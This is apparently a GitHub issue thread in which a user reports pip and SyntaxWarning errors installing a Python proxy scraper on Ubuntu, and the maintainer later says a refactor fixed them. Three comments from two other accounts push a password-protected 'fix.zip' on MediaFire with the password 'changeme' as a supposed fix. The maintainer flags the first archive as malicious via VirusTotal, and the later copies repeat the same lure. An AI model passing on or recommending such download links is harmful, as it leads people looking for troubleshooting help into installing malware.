### ISSUE TITLE
Error installing on Ubuntu 24.04 LTS (Python 3.12)

### ISSUE THREAD

**Issue by nafanz** [NoobToolzz/Bloody-Proxy-Scraper#3]
```
pip install -r requirements.txt
Requirement already satisfied: requests in ./venv/lib/python3.12/site-packages (from -r requirements.txt (line 1)) (2.32.3)
Requirement already satisfied: pystyle in ./venv/lib/python3.12/site-packages (from -r requirements.txt (line 2)) (2.9)
Requirement already satisfied: datetime in ./venv/lib/python3.12/site-packages (from -r requirements.txt (line 3)) (5.5)
Collecting console (from -r requirements.txt (line 4))
  Using cached console-0.9907-py2.py3-none-any.whl.metadata (17 kB)
ERROR: Exception:
Traceback (most recent call last):
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/cli/base_command.py", line 105, in _run_wrapper
    status = _inner_run()
             ^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/cli/base_command.py", line 96, in _inner_run
    return self.run(options, args)
           ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/cli/req_command.py", line 67, in wrapper
    return func(self, options, args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/commands/install.py", line 379, in run
    requirement_set = resolver.resolve(
                      ^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/resolver.py", line 95, in resolve
    result = self._result = resolver.resolve(
                            ^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/resolvelib/resolvers.py", line 546, in resolve
    state = resolution.resolve(requirements, max_rounds=max_rounds)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/resolvelib/resolvers.py", line 397, in resolve
    self._add_to_criteria(self.state.criteria, r, parent=None)
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/resolvelib/resolvers.py", line 173, in _add_to_criteria
    if not criterion.candidates:
           ^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/resolvelib/structs.py", line 156, in __bool__
    return bool(self._sequence)
           ^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/found_candidates.py", line 174, in __bool__
    return any(self)
           ^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/found_candidates.py", line 162, in <genexpr>
    return (c for c in iterator if id(c) not in self._incompatible_ids)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/found_candidates.py", line 53, in _iter_built
    candidate = func()
                ^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/factory.py", line 186, in _make_candidate_from_link
    base: Optional[BaseCandidate] = self._make_base_candidate_from_link(
                                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/factory.py", line 232, in _make_base_candidate_from_link
    self._link_candidate_cache[link] = LinkCandidate(
                                       ^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/candidates.py", line 303, in __init__
    super().__init__(
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/candidates.py", line 158, in __init__
    self.dist = self._prepare()
                ^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/candidates.py", line 247, in _prepare
    self._check_metadata_consistency(dist)
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/resolution/resolvelib/candidates.py", line 229, in _check_metadata_consistency
    list(dist.iter_dependencies(list(dist.iter_provided_extras())))
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/metadata/importlib/_dists.py", line 220, in iter_dependencies
    elif any(req.marker.evaluate(context) for context in contexts):
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_internal/metadata/importlib/_dists.py", line 220, in <genexpr>
    elif any(req.marker.evaluate(context) for context in contexts):
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/packaging/markers.py", line 325, in evaluate
    return _evaluate_markers(self._markers, current_environment)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/packaging/markers.py", line 225, in _evaluate_markers
    groups[-1].append(_eval_op(lhs_value, op, rhs_value))
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/packaging/markers.py", line 183, in _eval_op
    return spec.contains(lhs, prereleases=True)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/packaging/specifiers.py", line 552, in contains
    normalized_item = _coerce_version(item)
                      ^^^^^^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/packaging/specifiers.py", line 28, in _coerce_version
    version = Version(version)
              ^^^^^^^^^^^^^^^^
  File "/home/qa/Bloody-Proxy-Scraper/venv/lib/python3.12/site-packages/pip/_vendor/packaging/version.py", line 202, in __init__
    raise InvalidVersion(f"Invalid version: '{version}'")
pip._vendor.packaging.version.InvalidVersion: Invalid version: '#41-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug  2 20:41:06 UTC 2024'
```

**Comment by nafanz** [comment]
If you ignore installation errors and run the script, a problem occurs with specifying the path to the icon.

```
/home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:117: SyntaxWarning: invalid escape sequence '\i'
  icon_path="data\icons\logo.ico",
/home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:155: SyntaxWarning: invalid escape sequence '\i'
  icon_path="data\icons\logo.ico",
/home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:183: SyntaxWarning: invalid escape sequence '\i'
  icon_path="data\icons\logo.ico",
/home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:211: SyntaxWarning: invalid escape sequence '\i'
  icon_path="data\icons\logo.ico",
/home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:239: SyntaxWarning: invalid escape sequence '\i'
  icon_path="data\icons\logo.ico",
/home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:254: SyntaxWarning: invalid escape sequence '\i'
  icon_path="data\icons\logo.ico",
/home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:307: SyntaxWarning: invalid escape sequence '\i'
  icon_path="data\icons\logo.ico",
Error: An import was not found. Run setup.bat and try again.
If you don't have Python please install it by running tpython_installer.bat
sh: 1: pause: not found
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nafanz** [comment]
I downloaded the archive, but I don’t understand what to do with it `libssp-0.dll` and `x86_64-w64-ranlib.exe`.
I have Linux and I don't understand how and why to run files that are for Windows.

Please describe in more detail what they are used for and how I can install them (without breaking the system).

As you mentioned `gcc`, I checked what version I have installed.

```
gcc --version
gcc (Ubuntu 13.2.0-23ubuntu4) 13.2.0
Copyright (C) 2023 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```

**Comment by NoobToolzz** [comment]
> If you ignore installation errors and run the script, a problem occurs with specifying the path to the icon.
> 
> ```
> /home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:117: SyntaxWarning: invalid escape sequence '\i'
>   icon_path="data\icons\logo.ico",
> /home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:155: SyntaxWarning: invalid escape sequence '\i'
>   icon_path="data\icons\logo.ico",
> /home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:183: SyntaxWarning: invalid escape sequence '\i'
>   icon_path="data\icons\logo.ico",
> /home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:211: SyntaxWarning: invalid escape sequence '\i'
>   icon_path="data\icons\logo.ico",
> /home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:239: SyntaxWarning: invalid escape sequence '\i'
>   icon_path="data\icons\logo.ico",
> /home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:254: SyntaxWarning: invalid escape sequence '\i'
>   icon_path="data\icons\logo.ico",
> /home/qa/Bloody-Proxy-Scraper/Bloody Proxy Scraper V2.py:307: SyntaxWarning: invalid escape sequence '\i'
>   icon_path="data\icons\logo.ico",
> Error: An import was not found. Run setup.bat and try again.
> If you don't have Python please install it by running tpython_installer.bat
> sh: 1: pause: not found
> ```

This occurs because the AutoUpdate module I use no longer exists. If I do remember, I will remove the module and push the update. 

> I downloaded the archive, but I don’t understand what to do with it `libssp-0.dll` and `x86_64-w64-ranlib.exe`. I have Linux and I don't understand how and why to run files that are for Windows.
> 
> Please describe in more detail what they are used for and how I can install them (without breaking the system).
> 
> As you mentioned `gcc`, I checked what version I have installed.
> 
> ```
> gcc --version
> gcc (Ubuntu 13.2.0-23ubuntu4) 13.2.0
> Copyright (C) 2023 Free Software Foundation, Inc.
> This is free software; see the source for copying conditions.  There is NO
> warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
> ```

This isn't a fix, it's a malicious file. Here's the [behaviour](https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a/behavior). Don't run it.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NoobToolzz** [comment]
@nafanz This should all be fixed in the latest update. I refactored all the code. Please install the required modules before running. You may reopen this issue if you encounter further problems.
